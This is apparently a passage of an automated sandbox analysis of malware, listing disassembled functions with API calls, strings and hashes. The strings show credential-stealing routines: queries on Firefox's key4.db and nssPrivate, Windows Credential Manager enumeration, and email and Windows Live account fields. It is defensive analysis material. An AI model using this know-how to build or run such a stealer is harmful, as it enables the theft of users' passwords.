                                                                                                                                                                                                                      • Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                                      • Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406625 Relevance: 16.7, APIs: 7, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                                                      • C@, xrefs: 00406625
                                                                                                                                                                                                                      • key4.db, xrefs: 00406632
                                                                                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                                                      • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                      • API String ID: 2950547843-1835927508
                                                                                                                                                                                                                      • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                      • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408C8C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 3540791495-3849865405
                                                                                                                                                                                                                      • Opcode ID: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                                      • Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004019E9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4288758904-3916222277
                                                                                                                                                                                                                      • Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                                      • Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408458 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                                                                                      • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040859A
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00408612
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                                                                                        • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                      • API String ID: 1371990430-260894208
                                                                                                                                                                                                                      • Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                                      • Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041025A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                      • API String ID: 2859077140-2022683286
                                                                                                                                                                                                                      • Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                                      • Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406A1A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                      • API String ID: 2881943006-572158859
                                                                                                                                                                                                                      • Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                      • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404A94 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                      • Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                                      • Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004093DD Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                                                                                        • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                      • API String ID: 888011440-2039793938
                                                                                                                                                                                                                      • Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                                      • Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409989 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                                                                        • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                        • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                        • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                        • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                      • String ID: $$d
                                                                                                                                                                                                                      • API String ID: 2915808112-2066904009
                                                                                                                                                                                                                      • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                      • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403158 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                      • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                      • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041096F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                      • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                      • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405E41 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                                                        • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                                                        • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2432066023-0
                                                                                                                                                                                                                      • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                      • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F2E4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F396
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                                                                                      • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                      • API String ID: 945165440-3589380929
                                                                                                                                                                                                                      • Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                                      • Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004036D7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                        • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                        • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 00403711
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040376A
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                                                      • String ID: %s@gmail.com
                                                                                                                                                                                                                      • API String ID: 500647785-4097000612
                                                                                                                                                                                                                      • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                                      • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
